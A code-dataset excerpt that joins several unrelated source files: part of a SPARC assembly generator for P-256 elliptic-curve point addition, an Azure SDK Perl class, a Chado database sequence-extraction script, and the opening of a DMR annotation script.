ldx [%sp+LOCALS64+$in2_z+16],$a2
ldx [%sp+LOCALS64+$in2_z+24],$a3
add %sp,LOCALS64+$Z2sqr,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S1, Z2sqr, in2_z);
add %sp,LOCALS64+$S1,$rp
ldx [%sp+LOCALS64+$Z1sqr],$bi
ldx [%sp+LOCALS64+$in1_z],$a0
ldx [%sp+LOCALS64+$in1_z+8],$a1
ldx [%sp+LOCALS64+$in1_z+16],$a2
ldx [%sp+LOCALS64+$in1_z+24],$a3
add %sp,LOCALS64+$Z1sqr,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S2, Z1sqr, in1_z);
add %sp,LOCALS64+$S2,$rp
ldx [%sp+LOCALS64+$S1],$bi
ldx [%sp+LOCALS64+$in1_y],$a0
ldx [%sp+LOCALS64+$in1_y+8],$a1
ldx [%sp+LOCALS64+$in1_y+16],$a2
ldx [%sp+LOCALS64+$in1_y+24],$a3
add %sp,LOCALS64+$S1,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S1, S1, in1_y);
add %sp,LOCALS64+$S1,$rp
ldx [%sp+LOCALS64+$S2],$bi
ldx [%sp+LOCALS64+$in2_y],$a0
ldx [%sp+LOCALS64+$in2_y+8],$a1
ldx [%sp+LOCALS64+$in2_y+16],$a2
ldx [%sp+LOCALS64+$in2_y+24],$a3
add %sp,LOCALS64+$S2,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S2, S2, in2_y);
add %sp,LOCALS64+$S2,$rp
ldx [%sp+LOCALS64+$Z2sqr],$bi ! forward load
ldx [%sp+LOCALS64+$in1_x],$a0
ldx [%sp+LOCALS64+$in1_x+8],$a1
ldx [%sp+LOCALS64+$in1_x+16],$a2
ldx [%sp+LOCALS64+$in1_x+24],$a3
add %sp,LOCALS64+$S1,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(R, S2, S1);
add %sp,LOCALS64+$R,$rp
or $acc1,$acc0,$acc0 ! see if result is zero
or $acc3,$acc2,$acc2
or $acc2,$acc0,$acc0
stx $acc0,[%fp+STACK_BIAS-24]
add %sp,LOCALS64+$Z2sqr,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(U1, in1_x, Z2sqr);
add %sp,LOCALS64+$U1,$rp
ldx [%sp+LOCALS64+$Z1sqr],$bi
ldx [%sp+LOCALS64+$in2_x],$a0
ldx [%sp+LOCALS64+$in2_x+8],$a1
ldx [%sp+LOCALS64+$in2_x+16],$a2
ldx [%sp+LOCALS64+$in2_x+24],$a3
add %sp,LOCALS64+$Z1sqr,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(U2, in2_x, Z1sqr);
add %sp,LOCALS64+$U2,$rp
ldx [%sp+LOCALS64+$R],$a0 ! forward load
ldx [%sp+LOCALS64+$R+8],$a1
ldx [%sp+LOCALS64+$R+16],$a2
ldx [%sp+LOCALS64+$R+24],$a3
add %sp,LOCALS64+$U1,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(H, U2, U1);
add %sp,LOCALS64+$H,$rp
or $acc1,$acc0,$acc0 ! see if result is zero
or $acc3,$acc2,$acc2
orcc $acc2,$acc0,$acc0
bne,pt %xcc,.Ladd_proceed_vis3 ! is_equal(U1,U2)?
nop
ldx [%fp+STACK_BIAS-8],$t0
ldx [%fp+STACK_BIAS-16],$t1
ldx [%fp+STACK_BIAS-24],$t2
andcc $t0,$t1,%g0
be,pt %xcc,.Ladd_proceed_vis3 ! (in1infty || in2infty)?
nop
andcc $t2,$t2,%g0
be,a,pt %xcc,.Ldouble_shortcut_vis3 ! is_equal(S1,S2)?
add %sp,32*(12-10)+32,%sp ! difference in frame sizes
st %g0,[$rp_real]
st %g0,[$rp_real+4]
st %g0,[$rp_real+8]
st %g0,[$rp_real+12]
st %g0,[$rp_real+16]
st %g0,[$rp_real+20]
st %g0,[$rp_real+24]
st %g0,[$rp_real+28]
st %g0,[$rp_real+32]
st %g0,[$rp_real+32+4]
st %g0,[$rp_real+32+8]
st %g0,[$rp_real+32+12]
st %g0,[$rp_real+32+16]
st %g0,[$rp_real+32+20]
st %g0,[$rp_real+32+24]
st %g0,[$rp_real+32+28]
st %g0,[$rp_real+64]
st %g0,[$rp_real+64+4]
st %g0,[$rp_real+64+8]
st %g0,[$rp_real+64+12]
st %g0,[$rp_real+64+16]
st %g0,[$rp_real+64+20]
st %g0,[$rp_real+64+24]
st %g0,[$rp_real+64+28]
b .Ladd_done_vis3
nop
.align 16
.Ladd_proceed_vis3:
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Rsqr, R);
add %sp,LOCALS64+$Rsqr,$rp
ldx [%sp+LOCALS64+$H],$bi
ldx [%sp+LOCALS64+$in1_z],$a0
ldx [%sp+LOCALS64+$in1_z+8],$a1
ldx [%sp+LOCALS64+$in1_z+16],$a2
ldx [%sp+LOCALS64+$in1_z+24],$a3
add %sp,LOCALS64+$H,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(res_z, H, in1_z);
add %sp,LOCALS64+$res_z,$rp
ldx [%sp+LOCALS64+$H],$a0
ldx [%sp+LOCALS64+$H+8],$a1
ldx [%sp+LOCALS64+$H+16],$a2
ldx [%sp+LOCALS64+$H+24],$a3
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Hsqr, H);
add %sp,LOCALS64+$Hsqr,$rp
ldx [%sp+LOCALS64+$res_z],$bi
ldx [%sp+LOCALS64+$in2_z],$a0
ldx [%sp+LOCALS64+$in2_z+8],$a1
ldx [%sp+LOCALS64+$in2_z+16],$a2
ldx [%sp+LOCALS64+$in2_z+24],$a3
add %sp,LOCALS64+$res_z,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(res_z, res_z, in2_z);
add %sp,LOCALS64+$res_z,$rp
ldx [%sp+LOCALS64+$H],$bi
ldx [%sp+LOCALS64+$Hsqr],$a0
ldx [%sp+LOCALS64+$Hsqr+8],$a1
ldx [%sp+LOCALS64+$Hsqr+16],$a2
ldx [%sp+LOCALS64+$Hsqr+24],$a3
add %sp,LOCALS64+$H,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(Hcub, Hsqr, H);
add %sp,LOCALS64+$Hcub,$rp
ldx [%sp+LOCALS64+$U1],$bi
ldx [%sp+LOCALS64+$Hsqr],$a0
ldx [%sp+LOCALS64+$Hsqr+8],$a1
ldx [%sp+LOCALS64+$Hsqr+16],$a2
ldx [%sp+LOCALS64+$Hsqr+24],$a3
add %sp,LOCALS64+$U1,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(U2, U1, Hsqr);
add %sp,LOCALS64+$U2,$rp
call __ecp_nistz256_mul_by_2_vis3 ! p256_mul_by_2(Hsqr, U2);
add %sp,LOCALS64+$Hsqr,$rp
add %sp,LOCALS64+$Rsqr,$bp
call __ecp_nistz256_sub_morf_vis3 ! p256_sub(res_x, Rsqr, Hsqr);
add %sp,LOCALS64+$res_x,$rp
add %sp,LOCALS64+$Hcub,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(res_x, res_x, Hcub);
add %sp,LOCALS64+$res_x,$rp
ldx [%sp+LOCALS64+$S1],$bi ! forward load
ldx [%sp+LOCALS64+$Hcub],$a0
ldx [%sp+LOCALS64+$Hcub+8],$a1
ldx [%sp+LOCALS64+$Hcub+16],$a2
ldx [%sp+LOCALS64+$Hcub+24],$a3
add %sp,LOCALS64+$U2,$bp
call __ecp_nistz256_sub_morf_vis3 ! p256_sub(res_y, U2, res_x);
add %sp,LOCALS64+$res_y,$rp
add %sp,LOCALS64+$S1,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S2, S1, Hcub);
add %sp,LOCALS64+$S2,$rp
ldx [%sp+LOCALS64+$R],$bi
ldx [%sp+LOCALS64+$res_y],$a0
ldx [%sp+LOCALS64+$res_y+8],$a1
ldx [%sp+LOCALS64+$res_y+16],$a2
ldx [%sp+LOCALS64+$res_y+24],$a3
add %sp,LOCALS64+$R,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(res_y, res_y, R);
add %sp,LOCALS64+$res_y,$rp
add %sp,LOCALS64+$S2,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(res_y, res_y, S2);
add %sp,LOCALS64+$res_y,$rp
ldx [%fp+STACK_BIAS-16],$t1 ! !in1infty
ldx [%fp+STACK_BIAS-8],$t2 ! !in2infty
___
for($i=0;$i<96;$i+=16) { # conditional moves
$code.=<<___;
ldx [%sp+LOCALS64+$res_x+$i],$acc0 ! res
ldx [%sp+LOCALS64+$res_x+$i+8],$acc1
ldx [%sp+LOCALS64+$in2_x+$i],$acc2 ! in2
ldx [%sp+LOCALS64+$in2_x+$i+8],$acc3
ldx [%sp+LOCALS64+$in1_x+$i],$acc4 ! in1
ldx [%sp+LOCALS64+$in1_x+$i+8],$acc5
movrz $t1,$acc2,$acc0
movrz $t1,$acc3,$acc1
movrz $t2,$acc4,$acc0
movrz $t2,$acc5,$acc1
srlx $acc0,32,$acc2
srlx $acc1,32,$acc3
st $acc0,[$rp_real+$i]
st $acc2,[$rp_real+$i+4]
st $acc1,[$rp_real+$i+8]
st $acc3,[$rp_real+$i+12]
___
}
$code.=<<___;
.Ladd_done_vis3:
ret
restore
.size ecp_nistz256_point_add_vis3,.-ecp_nistz256_point_add_vis3
___
}
########################################################################
# void ecp_nistz256_point_add_affine(P256_POINT *out,const P256_POINT *in1,
# const P256_POINT_AFFINE *in2);
{
my ($res_x,$res_y,$res_z,
$in1_x,$in1_y,$in1_z,
$in2_x,$in2_y,
$U2,$S2,$H,$R,$Hsqr,$Hcub,$Rsqr)=map(32*$_,(0..14));
my $Z1sqr = $S2;
# above map() describes stack layout with 15 temporary
# 256-bit vectors on top. Then we reserve some space for
# !in1infty and !in2infty.
$code.=<<___;
.align 32
ecp_nistz256_point_add_affine_vis3:
save %sp,-STACK64_FRAME-32*15-32,%sp
mov $rp,$rp_real
mov -1,$minus1
mov -2,$poly3
sllx $minus1,32,$poly1 ! 0xFFFFFFFF00000000
srl $poly3,0,$poly3 ! 0x00000000FFFFFFFE
! convert input to uint64_t[4]
ld [$bp],$a0 ! in2_x
ld [$bp+4],$t0
ld [$bp+8],$a1
ld [$bp+12],$t1
ld [$bp+16],$a2
ld [$bp+20],$t2
ld [$bp+24],$a3
ld [$bp+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
ld [$bp+32],$acc0 ! in2_y
or $a0,$t0,$a0
ld [$bp+32+4],$t0
sllx $t2,32,$t2
ld [$bp+32+8],$acc1
or $a1,$t1,$a1
ld [$bp+32+12],$t1
sllx $t3,32,$t3
ld [$bp+32+16],$acc2
or $a2,$t2,$a2
ld [$bp+32+20],$t2
or $a3,$t3,$a3
ld [$bp+32+24],$acc3
sllx $t0,32,$t0
ld [$bp+32+28],$t3
sllx $t1,32,$t1
stx $a0,[%sp+LOCALS64+$in2_x]
sllx $t2,32,$t2
stx $a1,[%sp+LOCALS64+$in2_x+8]
sllx $t3,32,$t3
stx $a2,[%sp+LOCALS64+$in2_x+16]
or $acc0,$t0,$acc0
stx $a3,[%sp+LOCALS64+$in2_x+24]
or $acc1,$t1,$acc1
stx $acc0,[%sp+LOCALS64+$in2_y]
or $acc2,$t2,$acc2
stx $acc1,[%sp+LOCALS64+$in2_y+8]
or $acc3,$t3,$acc3
stx $acc2,[%sp+LOCALS64+$in2_y+16]
stx $acc3,[%sp+LOCALS64+$in2_y+24]
or $a1,$a0,$a0
or $a3,$a2,$a2
or $acc1,$acc0,$acc0
or $acc3,$acc2,$acc2
or $a2,$a0,$a0
or $acc2,$acc0,$acc0
or $acc0,$a0,$a0
movrnz $a0,-1,$a0 ! !in2infty
stx $a0,[%fp+STACK_BIAS-8]
ld [$ap],$a0 ! in1_x
ld [$ap+4],$t0
ld [$ap+8],$a1
ld [$ap+12],$t1
ld [$ap+16],$a2
ld [$ap+20],$t2
ld [$ap+24],$a3
ld [$ap+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
ld [$ap+32],$acc0 ! in1_y
or $a0,$t0,$a0
ld [$ap+32+4],$t0
sllx $t2,32,$t2
ld [$ap+32+8],$acc1
or $a1,$t1,$a1
ld [$ap+32+12],$t1
sllx $t3,32,$t3
ld [$ap+32+16],$acc2
or $a2,$t2,$a2
ld [$ap+32+20],$t2
or $a3,$t3,$a3
ld [$ap+32+24],$acc3
sllx $t0,32,$t0
ld [$ap+32+28],$t3
sllx $t1,32,$t1
stx $a0,[%sp+LOCALS64+$in1_x]
sllx $t2,32,$t2
stx $a1,[%sp+LOCALS64+$in1_x+8]
sllx $t3,32,$t3
stx $a2,[%sp+LOCALS64+$in1_x+16]
or $acc0,$t0,$acc0
stx $a3,[%sp+LOCALS64+$in1_x+24]
or $acc1,$t1,$acc1
stx $acc0,[%sp+LOCALS64+$in1_y]
or $acc2,$t2,$acc2
stx $acc1,[%sp+LOCALS64+$in1_y+8]
or $acc3,$t3,$acc3
stx $acc2,[%sp+LOCALS64+$in1_y+16]
stx $acc3,[%sp+LOCALS64+$in1_y+24]
or $a1,$a0,$a0
or $a3,$a2,$a2
or $acc1,$acc0,$acc0
or $acc3,$acc2,$acc2
or $a2,$a0,$a0
or $acc2,$acc0,$acc0
or $acc0,$a0,$a0
movrnz $a0,-1,$a0 ! !in1infty
stx $a0,[%fp+STACK_BIAS-16]
ld [$ap+64],$a0 ! in1_z
ld [$ap+64+4],$t0
ld [$ap+64+8],$a1
ld [$ap+64+12],$t1
ld [$ap+64+16],$a2
ld [$ap+64+20],$t2
ld [$ap+64+24],$a3
ld [$ap+64+28],$t3
sllx $t0,32,$t0
sllx $t1,32,$t1
or $a0,$t0,$a0
sllx $t2,32,$t2
or $a1,$t1,$a1
sllx $t3,32,$t3
stx $a0,[%sp+LOCALS64+$in1_z]
or $a2,$t2,$a2
stx $a1,[%sp+LOCALS64+$in1_z+8]
or $a3,$t3,$a3
stx $a2,[%sp+LOCALS64+$in1_z+16]
stx $a3,[%sp+LOCALS64+$in1_z+24]
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Z1sqr, in1_z);
add %sp,LOCALS64+$Z1sqr,$rp
ldx [%sp+LOCALS64+$in2_x],$bi
mov $acc0,$a0
mov $acc1,$a1
mov $acc2,$a2
mov $acc3,$a3
add %sp,LOCALS64+$in2_x,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(U2, Z1sqr, in2_x);
add %sp,LOCALS64+$U2,$rp
ldx [%sp+LOCALS64+$Z1sqr],$bi ! forward load
ldx [%sp+LOCALS64+$in1_z],$a0
ldx [%sp+LOCALS64+$in1_z+8],$a1
ldx [%sp+LOCALS64+$in1_z+16],$a2
ldx [%sp+LOCALS64+$in1_z+24],$a3
add %sp,LOCALS64+$in1_x,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(H, U2, in1_x);
add %sp,LOCALS64+$H,$rp
add %sp,LOCALS64+$Z1sqr,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S2, Z1sqr, in1_z);
add %sp,LOCALS64+$S2,$rp
ldx [%sp+LOCALS64+$H],$bi
ldx [%sp+LOCALS64+$in1_z],$a0
ldx [%sp+LOCALS64+$in1_z+8],$a1
ldx [%sp+LOCALS64+$in1_z+16],$a2
ldx [%sp+LOCALS64+$in1_z+24],$a3
add %sp,LOCALS64+$H,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(res_z, H, in1_z);
add %sp,LOCALS64+$res_z,$rp
ldx [%sp+LOCALS64+$S2],$bi
ldx [%sp+LOCALS64+$in2_y],$a0
ldx [%sp+LOCALS64+$in2_y+8],$a1
ldx [%sp+LOCALS64+$in2_y+16],$a2
ldx [%sp+LOCALS64+$in2_y+24],$a3
add %sp,LOCALS64+$S2,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S2, S2, in2_y);
add %sp,LOCALS64+$S2,$rp
ldx [%sp+LOCALS64+$H],$a0 ! forward load
ldx [%sp+LOCALS64+$H+8],$a1
ldx [%sp+LOCALS64+$H+16],$a2
ldx [%sp+LOCALS64+$H+24],$a3
add %sp,LOCALS64+$in1_y,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(R, S2, in1_y);
add %sp,LOCALS64+$R,$rp
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Hsqr, H);
add %sp,LOCALS64+$Hsqr,$rp
ldx [%sp+LOCALS64+$R],$a0
ldx [%sp+LOCALS64+$R+8],$a1
ldx [%sp+LOCALS64+$R+16],$a2
ldx [%sp+LOCALS64+$R+24],$a3
call __ecp_nistz256_sqr_mont_vis3 ! p256_sqr_mont(Rsqr, R);
add %sp,LOCALS64+$Rsqr,$rp
ldx [%sp+LOCALS64+$H],$bi
ldx [%sp+LOCALS64+$Hsqr],$a0
ldx [%sp+LOCALS64+$Hsqr+8],$a1
ldx [%sp+LOCALS64+$Hsqr+16],$a2
ldx [%sp+LOCALS64+$Hsqr+24],$a3
add %sp,LOCALS64+$H,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(Hcub, Hsqr, H);
add %sp,LOCALS64+$Hcub,$rp
ldx [%sp+LOCALS64+$Hsqr],$bi
ldx [%sp+LOCALS64+$in1_x],$a0
ldx [%sp+LOCALS64+$in1_x+8],$a1
ldx [%sp+LOCALS64+$in1_x+16],$a2
ldx [%sp+LOCALS64+$in1_x+24],$a3
add %sp,LOCALS64+$Hsqr,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(U2, in1_x, Hsqr);
add %sp,LOCALS64+$U2,$rp
call __ecp_nistz256_mul_by_2_vis3 ! p256_mul_by_2(Hsqr, U2);
add %sp,LOCALS64+$Hsqr,$rp
add %sp,LOCALS64+$Rsqr,$bp
call __ecp_nistz256_sub_morf_vis3 ! p256_sub(res_x, Rsqr, Hsqr);
add %sp,LOCALS64+$res_x,$rp
add %sp,LOCALS64+$Hcub,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(res_x, res_x, Hcub);
add %sp,LOCALS64+$res_x,$rp
ldx [%sp+LOCALS64+$Hcub],$bi ! forward load
ldx [%sp+LOCALS64+$in1_y],$a0
ldx [%sp+LOCALS64+$in1_y+8],$a1
ldx [%sp+LOCALS64+$in1_y+16],$a2
ldx [%sp+LOCALS64+$in1_y+24],$a3
add %sp,LOCALS64+$U2,$bp
call __ecp_nistz256_sub_morf_vis3 ! p256_sub(res_y, U2, res_x);
add %sp,LOCALS64+$res_y,$rp
add %sp,LOCALS64+$Hcub,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(S2, in1_y, Hcub);
add %sp,LOCALS64+$S2,$rp
ldx [%sp+LOCALS64+$R],$bi
ldx [%sp+LOCALS64+$res_y],$a0
ldx [%sp+LOCALS64+$res_y+8],$a1
ldx [%sp+LOCALS64+$res_y+16],$a2
ldx [%sp+LOCALS64+$res_y+24],$a3
add %sp,LOCALS64+$R,$bp
call __ecp_nistz256_mul_mont_vis3 ! p256_mul_mont(res_y, res_y, R);
add %sp,LOCALS64+$res_y,$rp
add %sp,LOCALS64+$S2,$bp
call __ecp_nistz256_sub_from_vis3 ! p256_sub(res_y, res_y, S2);
add %sp,LOCALS64+$res_y,$rp
ldx [%fp+STACK_BIAS-16],$t1 ! !in1infty
ldx [%fp+STACK_BIAS-8],$t2 ! !in2infty
1: call .+8
add %o7,.Lone_mont_vis3-1b,$bp
___
for($i=0;$i<64;$i+=16) { # conditional moves
$code.=<<___;
ldx [%sp+LOCALS64+$res_x+$i],$acc0 ! res
ldx [%sp+LOCALS64+$res_x+$i+8],$acc1
ldx [%sp+LOCALS64+$in2_x+$i],$acc2 ! in2
ldx [%sp+LOCALS64+$in2_x+$i+8],$acc3
ldx [%sp+LOCALS64+$in1_x+$i],$acc4 ! in1
ldx [%sp+LOCALS64+$in1_x+$i+8],$acc5
movrz $t1,$acc2,$acc0
movrz $t1,$acc3,$acc1
movrz $t2,$acc4,$acc0
movrz $t2,$acc5,$acc1
srlx $acc0,32,$acc2
srlx $acc1,32,$acc3
st $acc0,[$rp_real+$i]
st $acc2,[$rp_real+$i+4]
st $acc1,[$rp_real+$i+8]
st $acc3,[$rp_real+$i+12]
___
}
for(;$i<96;$i+=16) {
$code.=<<___;
ldx [%sp+LOCALS64+$res_x+$i],$acc0 ! res
ldx [%sp+LOCALS64+$res_x+$i+8],$acc1
ldx [$bp+$i-64],$acc2 ! "in2"
ldx [$bp+$i-64+8],$acc3
ldx [%sp+LOCALS64+$in1_x+$i],$acc4 ! in1
ldx [%sp+LOCALS64+$in1_x+$i+8],$acc5
movrz $t1,$acc2,$acc0
movrz $t1,$acc3,$acc1
movrz $t2,$acc4,$acc0
movrz $t2,$acc5,$acc1
srlx $acc0,32,$acc2
srlx $acc1,32,$acc3
st $acc0,[$rp_real+$i]
st $acc2,[$rp_real+$i+4]
st $acc1,[$rp_real+$i+8]
st $acc3,[$rp_real+$i+12]
___
}
$code.=<<___;
ret
restore
.size ecp_nistz256_point_add_affine_vis3,.-ecp_nistz256_point_add_affine_vis3
.align 64
.Lone_mont_vis3:
.long 0x00000000,0x00000001, 0xffffffff,0x00000000
.long 0xffffffff,0xffffffff, 0x00000000,0xfffffffe
.align 64
___
} }}}
# Purpose of these subroutines is to explicitly encode VIS instructions,
# so that one can compile the module without having to specify VIS
# extensions on compiler command line, e.g. -xarch=v9 vs. -xarch=v9a.
# Idea is to reserve for option to produce "universal" binary and let
# programmer detect if current CPU is VIS capable at run-time.
sub unvis3 {
my ($mnemonic,$rs1,$rs2,$rd)=@_;
my %bias = ( "g" => 0, "o" => 8, "l" => 16, "i" => 24 );
my ($ref,$opf);
my %visopf = ( "addxc" => 0x011,
"addxccc" => 0x013,
"umulxhi" => 0x016 );
$ref = "$mnemonic\t$rs1,$rs2,$rd";
if ($opf=$visopf{$mnemonic}) {
foreach ($rs1,$rs2,$rd) {
return $ref if (!/%([goli])([0-9])/);
$_=$bias{$1}+$2;
}
return sprintf ".word\t0x%08x !%s",
0x81b00000|$rd<<25|$rs1<<14|$opf<<5|$rs2,
$ref;
} else {
return $ref;
}
}
foreach (split("\n",$code)) {
s/\`([^\`]*)\`/eval $1/ge;
s/\b(umulxhi|addxc[c]{0,2})\s+(%[goli][0-7]),\s*(%[goli][0-7]),\s*(%[goli][0-7])/
&unvis3($1,$2,$3,$4)
/ge;
print $_,"\n";
}
close STDOUT;
| 25.404241 | 82 | 0.63521 |
73d10da0833782175f2c86139a5257fad76cf295 | 999 | pm | Perl | auto-lib/Azure/CustomerInsights/RelationshipResourceFormat.pm | pplu/azure-sdk-perl | 26cbef2d926f571bc1617c26338c106856f95568 | [
"Apache-2.0"
] | null | null | null | auto-lib/Azure/CustomerInsights/RelationshipResourceFormat.pm | pplu/azure-sdk-perl | 26cbef2d926f571bc1617c26338c106856f95568 | [
"Apache-2.0"
] | null | null | null | auto-lib/Azure/CustomerInsights/RelationshipResourceFormat.pm | pplu/azure-sdk-perl | 26cbef2d926f571bc1617c26338c106856f95568 | [
"Apache-2.0"
] | 1 | 2021-04-08T15:26:39.000Z | 2021-04-08T15:26:39.000Z | package Azure::CustomerInsights::RelationshipResourceFormat;
use Moose;
has 'id' => (is => 'ro', isa => 'Str' );
has 'name' => (is => 'ro', isa => 'Str' );
has 'type' => (is => 'ro', isa => 'Str' );
has 'cardinality' => (is => 'ro', isa => 'Str' );
has 'description' => (is => 'ro', isa => 'HashRef[Str]' );
has 'displayName' => (is => 'ro', isa => 'HashRef[Str]' );
has 'expiryDateTimeUtc' => (is => 'ro', isa => 'Str' );
has 'fields' => (is => 'ro', isa => 'ArrayRef[Azure::CustomerInsights::PropertyDefinition]' );
has 'lookupMappings' => (is => 'ro', isa => 'ArrayRef[Azure::CustomerInsights::RelationshipTypeMapping]' );
has 'profileType' => (is => 'ro', isa => 'Str' );
has 'provisioningState' => (is => 'ro', isa => 'Str' );
has 'relatedProfileType' => (is => 'ro', isa => 'Str' );
has 'relationshipGuidId' => (is => 'ro', isa => 'Str' );
has 'relationshipName' => (is => 'ro', isa => 'Str' );
has 'tenantId' => (is => 'ro', isa => 'Str' );
1;
| 49.95 | 110 | 0.533534 |
ed8f2342a6907be6f409a4c684af3b2c0c468b4b | 5,228 | pl | Perl | chado/extract_sequence_by_id.pl | CSynodinos/biocode | 3d4813f6cbf2aed6b15f7778244a3192b48cb3fb | [
"MIT"
] | 355 | 2015-01-15T18:11:20.000Z | 2022-03-26T19:23:30.000Z | chado/extract_sequence_by_id.pl | ypc123456/biocode | e27d7cda916c88fe20e2e437bc3adcd1ce2e3dcf | [
"MIT"
] | 43 | 2015-03-20T08:40:14.000Z | 2022-03-09T22:37:38.000Z | chado/extract_sequence_by_id.pl | ypc123456/biocode | e27d7cda916c88fe20e2e437bc3adcd1ce2e3dcf | [
"MIT"
] | 217 | 2015-01-29T08:40:33.000Z | 2022-03-26T19:23:45.000Z | #!/usr/bin/env perl
=head1 NAME
extract_sequence_by_id.pl - extract the sequence of a feature in Chado by its ID. Currently this
is limited to feature.uniquename, but will be expanded as needed.
=head1 SYNOPSIS
USAGE: extract_sequences_by_id.pl
--database=eha3
--user=someuser
--password=somepass
[ --uniquename=eha3.assembly.3425.1
--database_type=mysql
--server=yourserverhost
--output_file=/path/to/somefile.fsa
--log=/path/to/some.log ]
=head1 OPTIONS
B<--database,-d>
Database name to connect to.
B<--user,-u>
User account with select privileges on the specified database.
B<--password,-p>
Password for user account specified.
B<--uniquename,-n>
Optional. One method of identifying sequences to extract. Corresponds to feature.uniquename
B<--database_type>
Optional. Database type (vendor.) Currently supports 'mysql' or 'postgresql' (default = mysql).
B<--server,-s>
Optional. Database server to connect to (default = localhost).
B<--output_file,-o>
Optional. Can specify the output file (default = STDOUT).
B<--log,-l>
Optional. Full path to a log file to create.
B<--help,-h>
This help message
=head1 DESCRIPTION
The goal of this script is to allow the extraction of the feature of any sequence in a Chado
database. Currently rather limited, it allows selection by feature.uniquename value only
from a MySQL or Pg database.
=head1 INPUT
Required input includes the information necessary to connect to the database as well as
feature identifying info. Current methods include:
uniquename - the value in the feature.uniquename field.
This also assumes that feature.residues is also populated. The methods for access will
expand as needed.
=head1 OUTPUT
Features will be exported in FASTA format either on STDOUT or to a file (if --output_file is
passed)
Each FASTA sequence line contains 60 characters.
=head1 CONTACT
Joshua Orvis
jorvis@gmail.com
=cut
use strict;
use DBI;
use Getopt::Long qw(:config no_ignore_case no_auto_abbrev pass_through);
use Pod::Usage;
$|++;
my %options = ();
my $results = GetOptions (\%options,
'database|d=s',
'user|u=s',
'password|p=s',
'uniquename|n=s',
'database_type|a=s',
'server|s=s',
'output_file|o=s',
'log|l=s',
'help|h') || pod2usage();
## display documentation
if( $options{'help'} ){
pod2usage( {-exitval => 0, -verbose => 2, -output => \*STDERR} );
}
## make sure everything passed was peachy
&check_parameters(\%options);
## open the log if requested
my $logfh;
if (defined $options{log}) {
open($logfh, ">$options{log}") || die "can't create log file: $!";
}
_log("connecting to the database.");
my $dsn = '';
if ( $options{database_type} eq 'mysql' ) {
$dsn = "dbi:mysql:database=$options{database};host=$options{server}";
} elsif ( $options{database_type} eq 'postgresql' ) {
$dsn = "DBI:Pg:dbname=$options{database};host=$options{server}";
}
_log("attempting to create database connection");
my $dbh = DBI->connect($dsn, $options{user}, $options{password}, {PrintError=>1, RaiseError=>1} );
## manage the output file
my $ofh;
if ( $options{output_file} ) {
open($ofh, ">$options{output_file}") || die "failed to create output file: $!";
} else {
$ofh = *STDOUT;
}
## whatever method is used to pull sequences needs to result in the following columns (@results):
# 0. identifier 1. descriptive name (optional) 2. sequence
my $qry;
my @qry_opts = ();
my @results;
if ( $options{uniquename} ) {
$qry = qq{
SELECT uniquename, '', residues
FROM feature
WHERE uniquename = ?
};
push @qry_opts, $options{uniquename};
}
my $dsh = $dbh->prepare($qry);
$dsh->execute(@qry_opts);
while ( my $row = $dsh->fetchrow_arrayref ) {
@results = @$row;
last;
}
$dsh->finish();
if ( scalar(@results) == 3 ) {
print $ofh ">$results[0] $results[1]\n";
## format in lines of length 60
while ($results[2] =~ /(.{1,60})/g) {
print $ofh "$1\n";
}
print $ofh "\n";
} else {
die("failed to find a sequence with the passed criteria");
}
$dbh->disconnect();
exit(0);
sub _log {
my $msg = shift;
print $logfh "$msg\n" if $logfh;
}
sub check_parameters {
my $options = shift;
## make sure required arguments were passed
my @required = qw( database user password );
for my $option ( @required ) {
unless ( defined $$options{$option} ) {
die "--$option is a required option";
}
}
## one of the following must be passed
unless ( defined $$options{uniquename} ) {
die "you must define IDs to extract using the --uniquename option."
}
## handle some defaults
$$options{server} = 'localhost' unless defined $$options{server};
$$options{database_type} = 'mysql' unless defined $$options{database_type};
}
| 23.443946 | 101 | 0.619931 |
ed7dd05a61e5d9c78bc786b2e9a190be885df664 | 2,935 | pl | Perl | script/p02.DMR-annotator.pl | zd105/RRBSpipe | 009c5deb67c2be74ea057f75a42b9dae0728c9b8 | [
"MIT"
] | null | null | null | script/p02.DMR-annotator.pl | zd105/RRBSpipe | 009c5deb67c2be74ea057f75a42b9dae0728c9b8 | [
"MIT"
] | null | null | null | script/p02.DMR-annotator.pl | zd105/RRBSpipe | 009c5deb67c2be74ea057f75a42b9dae0728c9b8 | [
"MIT"
] | null | null | null | #!/usr/bin/perl
use strict;
use warnings;
use Getopt::Long;
use FindBin qw($Bin $Script);
use PerlIO::gzip;
my $usage=<<"USAGE";
name: $0
usage: perl $0
This perl is used to annotate the DMR into genomic elements (including promoter, CGI or any one you gave).
